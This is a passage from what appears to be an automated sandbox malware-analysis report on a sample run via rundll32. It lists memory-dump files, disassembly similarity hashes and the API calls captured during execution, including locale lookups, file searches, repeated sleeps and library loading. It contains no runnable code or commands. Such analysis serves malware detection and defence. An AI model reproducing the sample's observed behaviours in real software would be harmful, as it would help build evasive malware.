                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Open$QueryValue$CloseFileModuleName
                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                          • API String ID: 2701450724-3496071916
                          • Opcode ID: 4afd2b7b48ce371d30c337e2b12bd79f2a58c84e9ee2b4c594af9a85e795c04a
                          • Instruction ID: 05af0d7f2029f71a10c68c1639b48ed8a0d1e1dacfaf04c10325f7dc7332685a
                          • Opcode Fuzzy Hash: 4afd2b7b48ce371d30c337e2b12bd79f2a58c84e9ee2b4c594af9a85e795c04a
                          • Instruction Fuzzy Hash: 65610A71204BC589DB30DF71E8983DA23A5F78838CF51112A9B4D5BB5AEF78C695C348
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetUserDefaultUILanguage.KERNEL32 ref: 0041525E
                          • GetLocaleInfoW.KERNEL32 ref: 00415277
                            • Part of subcall function 00415080: FindFirstFileW.KERNEL32 ref: 004150B2
                            • Part of subcall function 00415080: FindClose.KERNEL32 ref: 004150CD
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                          • String ID:
                          • API String ID: 3216391948-0
                          • Opcode ID: 3b490b7cf56bbf91dd2b89981af10d7b9414ed50fc2553a7ed94af2cd6a02d18
                          • Instruction ID: a21e750fdb81c3cb80ceca5676c95766672ab79d1740a75253142ae5867d54cb
                          • Opcode Fuzzy Hash: 3b490b7cf56bbf91dd2b89981af10d7b9414ed50fc2553a7ed94af2cd6a02d18
                          • Instruction Fuzzy Hash: A321E476210A4089DB20EF76C8917D927A0EB88BDCF50212BFB4E57B69DF38C485C784
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 369 415080-4150c8 call 40ff70 call 411140 FindFirstFileW 374 4150d2-4150ec call 40fde0 369->374 375 4150ca-4150cd FindClose 369->375 375->374
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID:
                          • API String ID: 2295610775-0
                          • Opcode ID: 9164da4fdb7a13e248c7ae70de005f26abc0b9fef4fc521832ab366a37fbd560
                          • Instruction ID: 042890e011036333e5bfd1d3754174ebbb35ecdb7fac3d7a8451519e581d693b
                          • Opcode Fuzzy Hash: 9164da4fdb7a13e248c7ae70de005f26abc0b9fef4fc521832ab366a37fbd560
                          • Instruction Fuzzy Hash: E6F054622019C089CB71AF31C8952ED3710DB467ACF081336A66D4BBE5DE28C595C704
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: 77607eee1d5678264bfe421cdc9063a8fc63e9aedb2fd9a36f7780363d09e058
                          • Instruction ID: e264c793b7b64b5e8e85e408dd1c0600ffa873e8f413e1ccae946c0973a85fc5
                          • Opcode Fuzzy Hash: 77607eee1d5678264bfe421cdc9063a8fc63e9aedb2fd9a36f7780363d09e058
                          • Instruction Fuzzy Hash: FB11E632604B4885EB50EF66D89139D2761F799BD8F44503AFA0E87B69DF38C4918384
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • Sleep.KERNEL32 ref: 0080F91E
                            • Part of subcall function 00813C90: Sleep.KERNEL32 ref: 00813CAC
                            • Part of subcall function 00813C90: Sleep.KERNEL32 ref: 00813CC5
                          • Sleep.KERNEL32 ref: 0080F98C
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID: .exe$0~$ClassicIE_64$Romania Knives$bucket1$bucket2$bucket3
                          • API String ID: 3472027048-4255013377
                          • Opcode ID: db3348844e77e9109ac8b1ddecf22fe63a9ee44289eb9339e480d72f44ef8841
                          • Instruction ID: 5d250b9ed75b9a8aaf0cfb9770c26032a61d01ab42eb7c904a683a03c819acb6
                          • Opcode Fuzzy Hash: db3348844e77e9109ac8b1ddecf22fe63a9ee44289eb9339e480d72f44ef8841
                          • Instruction Fuzzy Hash: B671CD76210B85D8DB60EF66D8A13D93325F78479CF809026EB4D4BB6ADF78C649C384
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 99 419ed0-41a003 call 41ab60 call 41ab80 call 41aba0 call 41abc0 * 3 112 41a033-41a09d call 41a950 99->112 113 41a005-41a02e RaiseException 99->113 117 41a0ac 112->117 118 41a09f-41a0aa 112->118 114 41a404-41a40c 113->114 119 41a0b7-41a0c7 117->119 118->119 120 41a0e3-41a0f4 119->120 121 41a0c9-41a0e1 call 41abe0 119->121 123 41a0f8-41a109 120->123 121->123 125 41a10b-41a123 call 88e298 123->125 126 41a12f-41a135 123->126 125->126 140 41a125 125->140 128 41a269-41a27b 126->128 129 41a13b-41a143 126->129 130 41a292-41a298 128->130 131 41a27d-41a28d call 88e298 128->131 133 41a145-41a155 call 88e298 129->133 134 41a15a-41a160 129->134 138 41a34a-41a350 130->138 139 41a29e-41a2aa 130->139 131->130 133->134 135 41a171-41a177 134->135 136 41a162-41a16c LoadLibraryA 134->136 142 41a179-41a18d GetLastError 135->142 143 41a1dd-41a205 135->143 136->135 145 41a352-41a366 GetLastError 138->145 146 41a3b6-41a3c3 138->146 147 41a2b0-41a2bc 139->147 148 41a336-41a345 call 4194e0 139->148 149 41a3c6-41a3ce 140->149 153 41a1a4-41a1aa 142->153 154 41a18f-41a19f call 88e2a0 142->154 156 41a207-41a213 143->156 157 41a25f-41a264 call 419440 143->157 158 41a368-41a378 call 88e2a0 145->158 159 41a37d-41a383 145->159 146->149 147->148 160 41a2be-41a2de call 41a420 147->160 148->138 151 41a3d0-41a3f9 call 88e298 149->151 152 41a3ff 149->152 151->152 152->114 153->143 164 41a1ac-41a1d8 RaiseException 153->164 154->153 166 41a215-41a230 call 41a9a0 156->166 167 41a25d 156->167 157->128 158->159 159->146 170 41a385-41a3b1 RaiseException 159->170 160->148 176 41a2e0-41a2f4 call 41a440 160->176 164->114 177 41a251 166->177 178 41a232-41a24f call 41a970 166->178 167->128 170->146 176->148 182 41a2f6-41a30d call 41a460 176->182 177->167 178->167 182->148 186 41a30f-41a32a 182->186 186->148 187 41a32c 186->187 187->146
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
